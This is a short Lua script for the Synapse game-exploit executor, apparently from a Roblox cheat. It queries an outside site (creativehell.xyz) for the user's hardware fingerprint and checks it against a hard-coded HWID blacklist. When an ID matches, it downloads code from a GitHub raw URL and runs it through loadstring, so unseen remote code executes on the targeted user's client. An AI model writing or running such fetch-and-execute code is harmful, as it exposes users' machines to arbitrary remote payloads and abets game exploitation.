

local blacklisted_hwids = {
                        "{1}", "1", "0bb713c33d19cff5768a9f5ab4ee56180862d57995cbd4cd75bb6d758d3812f0ce913b6bffab95967296a5c507500a8ddfa6d162d9269b6c581054e5b2885031"
                         }

local body = syn.request({Url = 'https://creativehell.xyz/api/gethwid.php'; Method = 'GET'}).Body;
local json_decode = game:GetService('HttpService'):JSONDecode(body)
local Fingerprnit_list = {"Syn-Fingerprint", "proto-user-identifier"};
local hwid = "";

for i, v in next, Fingerprnit_list do
if json_decode[v] then
for i1, v1 in next, blacklisted_hwids do
if  v1 == json_decode[v] then
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Th12353/heesj/main/adminv"))('pizzapie')
end
end
end
end
